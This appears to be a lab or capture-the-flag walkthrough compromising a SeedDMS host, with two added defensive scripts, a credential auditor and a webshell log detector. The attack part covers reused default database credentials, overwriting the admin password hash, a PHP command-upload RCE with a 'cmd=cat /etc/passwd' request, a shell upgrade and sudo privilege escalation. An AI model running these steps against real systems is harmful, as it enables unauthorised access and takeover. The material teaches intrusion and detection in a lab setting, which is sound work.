nmap -sP 10.80.56.0/24
Attacking host: 10.80.56.101
Target: 10.80.56.183
nmap -p- 10.80.56.183
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
nmap -A -n -p 80 10.80.56.183
nmap -A -n -p 3306 10.80.56.183
nmap -A -n -p 33060 10.80.56.183
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to the land of pwnland
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL 8.0.25-0ubuntu0.20.04.1
| ssl-cert: Subject: commonName=MySQL_Server_8.0.25_Auto_Generated_Server_Certificate
| Not valid before: 2021-07-03T00:33:15
|_Not valid after: 2031-07-01T00:33:15
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.25-0ubuntu0.20.04.1
| Thread ID: 10
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, SwitchToSSLAfterHandshake, LongPassword, Speaks41ProtocolNew, ConnectWithDatabase, Support41Auth, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, IgnoreSigpipes, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x0D\x13V\x1D\x14\x18\x10\x064\x18\x03l\x11\x7F(Dl\x1C\x02\x01
|_ Auth Plugin Name: caching_sha2_password
http://10.80.56.183
<!--
Moonlight Template
https://templatemo.com/tm-512-moonlight
-->
dirb http://10.80.56.183
# Fetch the image
http://10.80.56.183/img/aa
# Inspecting it turns up an OpenPGP public key; looking that up, it is asymmetric encryption mostly used for email, and it does not seem useful here
zsteg aa.png
meta Software .. text: "Adobe ImageReady"
meta XML:com.adobe.xmp.. file: Unicode text, UTF-8 text, with very long lines (782), with no line terminators
b1,r,lsb,xy .. text: "J7[z{%^nD"
b2,abgr,lsb,xy .. text: "*62?11.0000/."
b2,abgr,msb,xy .. file: OpenPGP Secret Key
b3,abgr,msb,xy .. file: OpenPGP Public Key
b4,r,lsb,xy .. file: OpenPGP Public Key
b4,b,lsb,xy .. text: "eCC$B33233\""
b4,bgr,msb,xy .. text: "Wwu_wuWwu"
b4,rgba,lsb,xy .. text: "PP@/0`@_0N @@@@. -0,0"
b4,abgr,msb,xy .. text: "@' @G"
# So the only way forward is the front-end code
http://10.80.56.183/js/main.js
// give active class to first link
//make sure this js file is same as installed app on our server endpoint: /seeddms51x/seeddms-5.1.22/
$($('nav a')[0]).addClass('active');
# Found the admin interface
http://10.80.56.183/seeddms51x/seeddms-5.1.22/
# Searching for exploits finds an RCE, but none of them get past the login
searchsploit seeddms
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------------------------------------------------- ---------------------------------
# Finally, a walkthrough shows that this SeedDMS keeps its database credentials in settings.xml under the conf directory
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"> </database>
# Log in to the database
mysql -h 10.80.56.183 -useeddms -pseeddms
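Two things made that login possible: the config file held the database password in cleartext with a default value, and MySQL accepted the account from the network. The following script is an added example (not SeedDMS code) that audits a settings.xml for exactly those weaknesses; the file permissions check, the weak-password list and the sample file are assumptions built here.

```python
"""Audit a SeedDMS conf/settings.xml for cleartext default database credentials."""
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed copy of the <database> element shown in the walkthrough.
SAMPLE_SETTINGS = """<?xml version="1.0"?>
<configuration>
  <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms"
            dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"> </database>
</configuration>"""

# Assumed list of values that should never appear as a deployed DB password.
WEAK_PASSWORDS = {"", "seeddms", "password", "root", "123456"}


def audit_settings(path):
    """Return a list of finding strings for the settings.xml at `path`."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("settings.xml readable by group/other (mode %o)" % mode)
    db = ET.parse(path).getroot().find("database")
    if db is None:
        return findings + ["no <database> element found"]
    user, pwd = db.get("dbUser", ""), db.get("dbPass", "")
    if pwd.lower() in WEAK_PASSWORDS or pwd == user:
        findings.append("database password for user %r is a default/weak value" % user)
    # dbHostname=localhost only says where the app connects from; the MySQL
    # account must also be 'seeddms'@'localhost' (not '%') and the server
    # bound to loopback, or the same credentials work from any host.
    host = db.get("dbHostname", "localhost")
    if host not in ("localhost", "127.0.0.1"):
        findings.append("database reached over the network via host %r" % host)
    return findings


def demo():
    """Write the sample config with a typical 0644 mode and audit it."""
    fd, path = tempfile.mkstemp(suffix=".xml")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_SETTINGS)
    os.chmod(path, 0o644)
    try:
        return audit_settings(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for finding in demo():
        print("FINDING:", finding)
```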
# The user table
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1 | saket | saurav | Saket@#$1337 |
+-------------+---------------------+--------------------+-----------------+
# The tblUsers table
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
# Tried to crack the MD5 but failed, so update the database directly, setting the password to the MD5 of 123456
UPDATE tblUsers SET pwd='e10adc3949ba59abbe56e057f20f883e' where id=1;
# Logged in to the admin panel. 47022.txt shows a file upload, and the uploaded file is reachable at data/1048576/document_id/1.php
cat 47022.txt
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
# Upload a 1.php reverse shell script following that format
http://10.80.56.183/seeddms51x/data/1048576/11/1.php
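The request that triggers the uploaded script is easy to spot in the web server log, because nothing under the SeedDMS data/ tree should ever be executed server-side. The detector below is an added example, not part of the walkthrough; the Apache combined-format log lines are constructed here and reuse the /seeddms51x/data/1048576/<docid>/ path seen above.

```python
"""Flag web requests that execute script files stored under the SeedDMS data/ tree."""
import re
from urllib.parse import urlsplit

# Constructed sample log lines (client IP, timestamps and sizes are made up).
SAMPLE_LOG = """\
10.80.56.101 - - [13/Jul/2021:10:01:02 +0000] "GET /seeddms51x/seeddms-5.1.22/out/out.ViewDocument.php?documentid=11 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.80.56.101 - - [13/Jul/2021:10:01:30 +0000] "GET /seeddms51x/data/1048576/11/1.php?cmd=id HTTP/1.1" 200 96 "-" "Mozilla/5.0"
10.80.56.101 - - [13/Jul/2021:10:01:45 +0000] "GET /seeddms51x/data/1048576/10/1.pdf HTTP/1.1" 200 80311 "-" "Mozilla/5.0"
10.80.56.101 - - [13/Jul/2021:10:02:01 +0000] "POST /seeddms51x/data/1048576/12/1.phtml HTTP/1.1" 200 12 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# SeedDMS stores uploads as data/<folder>/<docid>/<version>.<ext>; a script
# extension in that tree means an upload is being run by the web server.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)


def suspicious_requests(log_text):
    """Return (ip, timestamp, path, status) for each request executing a script under data/."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m.group("target")).path  # drop ?cmd=... so the match is on the path only
        if "/data/" in path and SCRIPT_EXT.search(path):
            hits.append((m.group("ip"), m.group("ts"), path, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("ALERT script executed from DMS storage:", hit)
```

The matching fix on the server side is to turn the PHP handler off for the data directory and to reject script extensions at upload time, so a hit in this log means a control is missing.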
# Upgrade to an interactive shell
python3 -c "import pty;pty.spawn('/bin/bash')"
# In /home there is a user named saket
saket@ubuntu:/home$ ls
ls
saket
# Using the credentials from the database above, switch user
su saket
# Check the sudo privileges: they are unrestricted root
sudo -l
# Escalate privileges; machine complete
sudo su
cd /root
HACK_ME_PLEASE target machine penetration notes